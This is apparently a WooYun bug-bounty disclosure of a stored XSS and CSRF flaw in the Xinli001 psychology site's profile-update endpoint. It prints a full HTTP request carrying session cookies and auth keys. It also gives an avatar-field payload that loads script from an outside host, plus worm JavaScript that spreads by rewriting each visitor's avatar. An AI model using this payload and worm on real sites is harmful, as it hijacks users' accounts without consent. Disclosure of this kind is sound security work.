WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader --------- http://drop.zone.ci/
2015-11-02: Details have been sent to the vendor and are awaiting the vendor's handling. 2015-11-07: The vendor has actively ignored the vulnerability; the details are now public.
Xinli001 (壹心理), best of best, building China's best psychology brand.
Stored XSS:
POST /ajax/update-user-profile HTTP/1.1
Host: www.xinli001.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.xinli001.com/user/setting
Content-Length: 49
Cookie: lzstat_uv=38348821501812510113|2646296@3462520@3562675@3597499; Hm_lvt_d64469e9d7bdbf03af6f074dffe7f9b5=1446107039,1446179415,1446188216,1446432295; laravel_session=eyJpdiI6IjNsNzN1clJXK25IUDBtY3BrZVRja3c9PSIsInZhbHVlIjoiWVVWbG94b3YzTXNCc0hPY3BjUXdpczJaVGZiSVBnSFdYZ1ArMDZmbzNBUVpJdEtKWHFQRDM2Z3IySEJMRmczZEZtQlIrZGYwMVN1UTA3VFlBTm8xS0E9PSIsIm1hYyI6IjIxY2FkYTkyMmYwYjc5ZjAwZTZjMzY4ZWQ5NWM4ZDQ0MmJmZTY0MzMwYTczNjI5MzQ4NWEzNTE1OWU1NmE1N2IifQ%3D%3D; sessionid=6pww0c6ccqhi193nijiwbtu8yypoitxf; expires=Fri, 06-Nov-2015 06:14:39 GMT; bdshare_firstime=1446191998449; common_auth_key=ef825bd915065102b725a482c9792bae; lzstat_ss=1919308479_1_1446473629_2646296|1591989281_2_1446461522_3597499|988365104_1_1446461581_3462520; Hm_lpvt_d64469e9d7bdbf03af6f074dffe7f9b5=1446444830
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

avatar=http%3A%2F%2Fwww.sk15.net%2Fimg%2Fsk15.ico
The avatar parameter is the avatar image URL, and a stored XSS payload can be written into it. The same endpoint is also vulnerable to CSRF, since there is no token check. So we set avatar to http://www.sk15.net/img/sk15.ico"><script src="http://www.sk15.net/js/sk15.js"></script>< to load an external JS file. The external JS code is as follows:
(function(){
    /*
     * Worm start: the visitor submits an avatar change via CSRF
     */
    $.ajax({
        type: "POST",
        url: "/ajax/update-user-profile",
        data: {avatar:'http://www.sk15.net/img/sk15.ico"><script src="http://www.sk15.net/js/sk15.js"></script><'},
        dataType: "json",
        success: function(data){ }
    });
})();
This way, by posting comments in the community and similar means, as soon as a user visits the page, their avatar is changed to the stored XSS we wrote, and the worm propagates.
Strict filtering.
Severity: no impact (vendor ignored)
Ignored at: 2015-11-07 14:44
Vulnerability Rank: 2 (WooYun rating)
None yet.